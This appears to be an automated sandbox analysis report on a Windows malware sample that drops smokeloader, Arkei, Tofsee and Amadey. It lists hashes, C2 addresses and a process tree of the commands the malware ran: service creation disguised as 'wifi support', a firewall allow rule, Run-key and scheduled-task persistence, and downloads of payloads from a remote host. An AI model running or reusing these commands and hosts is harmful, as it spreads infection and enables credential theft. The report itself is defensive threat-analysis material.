Analysis
-
max time kernel
128s -
max time network
153s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-01-2022 19:46
General
-
Target
a7444553f8a8fe2702b6fd48008d6605.exe
-
Size
277KB
-
MD5
a7444553f8a8fe2702b6fd48008d6605
-
SHA1
f6d3d6ccf728ae7ab39b7e29f21ae5bcc7fce98b
-
SHA256
ba5303301925a877689b30efc36f872564f06906b2a61d7c3a7c955b0587d4f8
-
SHA512
28a1edb043ae30af213cbfe93745f2d94a4f9f5b76668cbed0889780dc7031e4a6d1caa839d78035a42769bc13d2d0a376e13e50779807edbcd3189d44f070bf
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://host-data-coin-11.com/
http://file-coin-host-12.com/
rc4.i32
rc4.i32
Extracted
Family
arkei
Botnet
Default
C2
http://file-file-host4.com/tratata.php
Extracted
Family
tofsee
C2
patmushta.info
parubey.info
Extracted
Family
amadey
Version
3.01
C2
185.215.113.35/d2VxjasuwS/index.php
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Arkei
Arkei is an infostealer written in C++.
-
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
Arkei Stealer Payload 2 IoCs
-
LoaderBot executable 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 23 IoCs
-
Modifies Windows Firewall 1 TTPs
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 4 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe"C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe"C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\8B7D.exeC:\Users\Admin\AppData\Local\Temp\8B7D.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\93DC.exeC:\Users\Admin\AppData\Local\Temp\93DC.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\93DC.exeC:\Users\Admin\AppData\Local\Temp\93DC.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\AE8D.exeC:\Users\Admin\AppData\Local\Temp\AE8D.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\C411.exeC:\Users\Admin\AppData\Local\Temp\C411.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\njjjzucd\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gzotmolu.exe" C:\Windows\SysWOW64\njjjzucd\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create njjjzucd binPath= "C:\Windows\SysWOW64\njjjzucd\gzotmolu.exe /d\"C:\Users\Admin\AppData\Local\Temp\C411.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description njjjzucd "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start njjjzucd2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\D8F9.exeC:\Users\Admin\AppData\Local\Temp\D8F9.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\D8F9.exeC:\Users\Admin\AppData\Local\Temp\D8F9.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\njjjzucd\gzotmolu.exeC:\Windows\SysWOW64\njjjzucd\gzotmolu.exe /d"C:\Users\Admin\AppData\Local\Temp\C411.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5223.exeC:\Users\Admin\AppData\Local\Temp\5223.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\4⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Local\Temp\5936.exeC:\Users\Admin\AppData\Local\Temp\5936.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\5BB9.bat C:\Users\Admin\AppData\Local\Temp\5936.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/download" "http://a0621298.xsph.ru/KX6KAZ9Tip.exe" "setup_c.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\722\123.vbs"3⤵
- Blocklisted process makes network request
-
-
C:\Users\Admin\AppData\Local\Temp\722\setup_c.exesetup_c.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/download" "http://a0621298.xsph.ru/RMR.exe" "setup_m.exe" "" "" "" "" "" ""3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\722\setup_m.exesetup_m.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/download" "http://a0621298.xsph.ru/c_setup.exe" "setup_s.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Users\Admin\AppData\Local\Temp\722\setup_s.exesetup_s.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
-
C:\Users\Admin\AppData\Local\Temp\7040.exeC:\Users\Admin\AppData\Local\Temp\7040.exe1⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\9435.exeC:\Users\Admin\AppData\Local\Temp\9435.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\A2E5.exeC:\Users\Admin\AppData\Local\Temp\A2E5.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\C803.exeC:\Users\Admin\AppData\Local\Temp\C803.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\D7FB.exeC:\Users\Admin\AppData\Local\Temp\D7FB.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
328KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
8KB
-
Filesize
76KB
-
Filesize
336KB
-
Filesize
52KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
384KB
-
Filesize
284KB
-
Filesize
4KB
-
Filesize
1.4MB
-
Filesize
276KB
-
Filesize
348KB
-
Filesize
4KB
-
Filesize
572KB
-
Filesize
392KB
-
Filesize
12.3MB
-
Filesize
92KB
-
Filesize
84KB
-
Filesize
512KB
-
Filesize
392KB
-
Filesize
296KB
-
Filesize
688KB
-
Filesize
392KB
-
Filesize
212KB
-
Filesize
328KB
-
Filesize
120KB
-
Filesize
224KB
-
Filesize
1.5MB
-
Filesize
8KB
-
Filesize
1.5MB
-
Filesize
120KB
-
Filesize
384KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
640KB
-
Filesize
768KB
-
Filesize
39.8MB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
552KB
-
Filesize
552KB
-
Filesize
68KB
-
Filesize
112KB
-
Filesize
352KB
-
Filesize
4.4MB
-
Filesize
4KB
-
Filesize
4.4MB
-
Filesize
4.4MB
-
Filesize
1.4MB
-
Filesize
296KB
-
Filesize
276KB
-
Filesize
572KB
-
Filesize
688KB
-
Filesize
284KB
-
Filesize
348KB
-
Filesize
12.3MB
-
Filesize
512KB
-
Filesize
1.4MB
-
Filesize
12.3MB
-
Filesize
572KB
-
Filesize
512KB
-
Filesize
4KB
-
Filesize
524KB
-
Filesize
348KB
-
Filesize
92KB
-
Filesize
284KB
-
Filesize
524KB
-
Filesize
688KB
-
Filesize
276KB
-
Filesize
212KB
-
Filesize
4KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
296KB